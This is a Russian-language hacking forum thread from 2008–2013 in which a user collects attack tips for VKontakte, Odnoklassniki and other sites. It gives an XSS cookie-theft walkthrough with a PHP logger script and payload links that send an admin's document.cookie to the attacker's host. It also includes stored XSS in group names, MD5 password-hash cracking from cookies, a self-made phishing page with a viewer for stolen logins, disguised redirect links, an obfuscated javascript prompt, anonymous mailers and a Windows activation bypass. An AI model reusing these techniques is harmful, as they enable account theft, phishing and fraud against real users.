Отправлено: 20.10.08 12:42. Заголовок: Хакинг

Решил возобновить давно забытую тему

Секреты ВКонтакте:
http://vseokontakte.ru/category/sekrety-vkontakte/

Выцепить пароль из кукисов:
пользователь входит на страничку под своим аккаунтом,
затем в url ввести javascript:document.write(document.cookie)
Получаем:
remixchk=5; remixmid=1892135; remixemail=<user>%40mail.ru; remixpass=32105a88942c409249c3710882ca57c4; remixlang=0; remixautobookmark=2

расшифровываем remixpass, который является MD5 хэшем и вуа-ля:)

 Отправлено: 20.10.08 13:23. Заголовок: Входим на сайты, не регистрируясь:)

Входим на сайты, не регистрируясь через www.bugmenot.com:)

Берём логин и пароль:
http://www.bugmenot.com/view/odnoklassniki.ru
http://www.bugmenot.com/view/vkontakte.ru
http://www.bugmenot.com/view/loveplanet.ru

 Отправлено: 20.10.08 13:45. Заголовок: Ещё почитать про вко..

Ещё почитать про вконтакт: http://glamer.livejournal.com/12344.html
неплохая прокся: http://hideme.ru

 Отправлено: 31.10.08 11:17. Заголовок: Уязвимость: http://v..

Уязвимость:
http://vkontakte.ru/profile.php Заходим в свой профиль и пишем у себя на стене:
!test

 Отправлено: 06.11.08 09:08. Заголовок: Доки по хакингу: htt..

Доки по хакингу:
http://www.inattack.ru/group_article/45.html

 Отправлено: 06.11.08 10:25. Заголовок: нужная штучка: http:..

нужная штучка: http://ha.ckers.org/xss.html

 Отправлено: 06.11.08 14:22. Заголовок: Дыра в одноклассника..

Дыра в одноклассниках:

Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... но она легко снимается оперой:)))

Пример названия группы:
</title><script>alert('Андрюха мегакрут!!!!!!!!!!!')</script>

 Отправлено: 06.11.08 16:21. Заголовок: мой сниффер: http://..

мой сниффер:
http://na-s.ru/images/rainstuff_1.gif?document.cookie

пашет глючно...

 Отправлено: 07.11.08 08:43. Заголовок: Сцуко дыру в однокаш..

Сцуко дыру в однокашниках прикрыли... хрен я ещё здесь про них что-то напишу

 Отправлено: 12.11.08 10:39. Заголовок: Рассылка анонимных м..

Рассылка анонимных мейлов:
http://businessland.h14.ru/E-mail/mail.htm
http://email.rl6.ru

 Отправлено: 12.11.08 11:35. Заголовок: Конвертируем длинное..

Конвертируем длинное Url в короткое:
http://tinyurl.com

 Отправлено: 12.11.08 15:26. Заголовок: Бесплатный Хостинг с..

Бесплатный Хостинг с поддержкой php:
http://holm.ru
http://jino-net.ru

 Отправлено: 12.11.08 15:28. Заголовок: Пример взлома: Если..

Пример взлома:

Если ты нашёл xss багу на его сайте, тогда надо сделать простенький скрипт на пхп...

c0d3:
<?
if ($QUERY_STRING=="") exit;
$a=fopen ("data.dat","a+");
fwrite($a, "$QUERY_STRING" \n\n");
fclose($a);
echo "l4m0_w4z_x553d";
mail ("твоё_мыло@mail.ru", "l4m0_w4z_x553d! NetMast 1s g0d", "$QUERY_STRING");
?>

Называем файл, ну допустим, css.php

Дальше идём на любой халявный хост с поддержкой php (пример, http://holm.ru)
Регим там свой акк... заливаем туда это скрипт (css.php)
Дальше... узнаём мыло админа... и кидаем ему такую ссылку и пишем типо нашёл опечатку или ещё что-то... короч посмотрите...
Ссылка должна быть такая:
http://site.com/q=<script>document.location.replace('http://твой_сайт.ru/css.php?'+document.cookie)</script>
или ещё вариант
http://site.com/q=<script>open('http://твой_сайт.ru/css.php?'+document.cookie)</script>
или
http://site.com/q=<script>var i=new Image(); i.src='http://твой_сайт.ru/css.php?+dociment.cookie';</script>

где "http://site.com/q=" - это тот параметр, где ты нашёл xss багу...


Вроже бы всё... и потом глядишь и админские кукисы у тебя

 Отправлено: 14.11.08 17:27. Заголовок: Мой первый фейк: htt..

Мой первый фейк:
http://rainstuff.phpnet.us/mailr.htm
или вот так, чтоб не палицца (без рекламы)
http://rainstuff.vndv.com/mailr.htm

просмотр стыренного логина-пароля:
http://rainstuff.vndv.com/viewmambabase.php

 Отправлено: 17.11.08 10:30. Заголовок: Прячем ссылку... htt..

Прячем ссылку...
http://r.mail.ru/clb581/rainstuff.vndv.com/mailru.htm
или даже вот так:
http://r.mail.ru/clb581/%74%69%6E%79%75%72%6C%2E%63%6F%6D/5auxuw

 Отправлено: 20.11.08 07:40. Заголовок: Получаем сверкоротки..

Получаем сверкороткие URL:
http://fff.to
http://qfwr.com
http://snipurl.com

 Отправлено: 09.02.10 11:48. Заголовок: введи в строке брауз..

введи в строке браузера:

javascript:eval(String.fromCharCode(118, 97, 114, 32, 114, 97, 116, 101, 110, 117, 109, 32, 61, 32, 112, 114, 111, 109, 112, 116, 40, 39, 1053, 1072, 32, 1089, 1082, 1086, 1083, 1100, 1082, 1086, 32, 1087, 1086, 1076, 1085, 1103, 1090, 1100, 32, 1088, 1077, 1081, 1090, 1080, 1085, 1075, 32, 63, 39, 41, 59, 97, 108, 101, 114, 116, 40, 39, 1056, 1077, 1081, 1090, 1080, 1085, 1075, 32, 1091, 1089, 1087, 1077, 1096, 1085, 1086, 32, 1087, 1086, 1076, 1085, 1103, 1085, 32, 1085, 1072, 32, 39, 43, 114, 97, 116, 101, 110, 117, 109, 43, 39, 32, 1077, 1076, 1080, 1085, 1080, 1094, 32, 45, 32, 1087, 1077, 1088, 1077, 1079, 1072, 1081, 1076, 1080, 1090, 1077, 32, 1087, 1086, 1078, 1072, 1081, 1083, 1091, 1089, 1090, 1072, 32, 1076, 1083, 1103, 32, 1072, 1082, 1090, 1080, 1074, 1072, 1094, 1080, 1080, 32, 46, 39, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 105, 110, 110, 101, 114, 72, 116, 109, 108, 61, 39, 60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 118, 107, 111, 110, 116, 97, 107, 116, 101, 46, 114, 117, 34, 32, 119, 105, 100, 116, 104, 61, 34, 49, 48, 48, 37, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 49, 48, 48, 37, 34, 32, 102, 114, 97, 109, 101, 98, 111, 114, 100, 101, 114, 61, 34, 48, 34, 62, 39, 59))

код в циферках аналогичен:
var ratenum = prompt('На сколько поднять рейтинг ?');alert('Рейтинг успешно поднян на '+ratenum+' единиц - перезайдите пожайлуста для активации .');document.innerHtml='<iframe src="http://vkontakte.ru" width="100%" height="100%" frameborder="0">';



Полезный сайтец:
http://jdstiles.com/java/cct.html
взято отсюда: http://forum.inattack.ru/lofiversion/index.php/t19830.html

 Отправлено: 15.11.10 12:46. Заголовок: расчитывает разные т..

расчитывает разные типы хешей:
http://insidepro.com/hashes.php<\/u><\/a>

 Отправлено: 22.05.11 21:59. Заголовок: похоже мне удалось р..

похоже мне удалось раскодировать ссылки на необуксе (neobux.com)
http://www.freeworld.hotmail.ru/Downloads/MyProgs/neobux_linkdecode.zip

 Отправлено: 26.05.11 18:12. Заголовок: '%u0401&..

'%u0401' => 'Ё',

'%u0410' => 'А',
'%u0411' => 'Б',
'%u0412' => 'В',
'%u0413' => 'Г',
'%u0414' => 'Д',
'%u0415' => 'Е',
'%u0416' => 'Ж',
'%u0417' => 'З',
'%u0418' => 'И',
'%u0419' => 'Й',
'%u041A' => 'К',
'%u041B' => 'Л',
'%u041C' => 'М',
'%u041D' => 'Н',
'%u041E' => 'О',
'%u041F' => 'П',
'%u0420' => 'Р',
'%u0421' => 'С',
'%u0422' => 'Т',
'%u0423' => 'У',
'%u0424' => 'Ф',
'%u0425' => 'Х',
'%u0426' => 'Ц',
'%u0427' => 'Ч',
'%u0428' => 'Ш',
'%u0429' => 'Щ',
'%u042A' => 'Ъ',
'%u042B' => 'Ы',
'%u042C' => 'Ь',
'%u042D' => 'Э',
'%u042E' => 'Ю',
'%u042F' => 'Я',
'%u0430' => 'а',
'%u0431' => 'б',
'%u0432' => 'в',
'%u0433' => 'г',
'%u0434' => 'д',
'%u0435' => 'е',
'%u0436' => 'ж',
'%u0437' => 'з',
'%u0438' => 'и',
'%u0439' => 'й',
'%u043A' => 'к',
'%u043B' => 'л',
'%u043C' => 'м',
'%u043D' => 'н',
'%u043E' => 'о',
'%u043F' => 'п',
'%u0440' => 'р',
'%u0441' => 'с',
'%u0442' => 'т',
'%u0443' => 'у',
'%u0444' => 'ф',
'%u0445' => 'х',
'%u0446' => 'ц',
'%u0447' => 'ч',
'%u0448' => 'ш',
'%u0449' => 'щ',
'%u044A' => 'ъ',
'%u044B' => 'ы',
'%u044C' => 'ь',
'%u044D' => 'э',
'%u044E' => 'ю',
'%u044F' => 'я',

'%u0451' => 'ё',

'%u2116' => '№',

 Отправлено: 16.09.12 16:03. Заголовок: Декодируем кодирован..

Декодируем кодированный java-script

http://alexvaleev.ru/javascript-optimizator/
http://jsbeautifier.org/

 Отправлено: 27.04.13 21:23. Заголовок: отключение проверки ..

отключение проверки windows
добавить в hosts
127.0.0.1 mpa.one.microsoft.com

"Взять к примеру дядю Билла - наворотил свой Виндовс ХР так. что тот теперь требует проверки подлинности и не дает
обновляться пиратским копиям (затратили на это наверное миллионы...). А выход до жути прост - открываем в редактре файл hosts (%SystemRoot%\system32\drivers\etc\hosts) и вписываем в него такую строку:
127.0.0.1 mpa.one.microsoft.com,
после чего удаляем файл "%ALLUSERSPROFILE%\Application Data\Windows Genuine Advantage\data\data.dat".
Все! Теперь спокойно идем на Windows Update и обновляем систему. Гениально просто!
Сам таким образом обновляюсь уже три месяца и поставил ИЕ7 и последний ВМ плейер." - конец цитаты.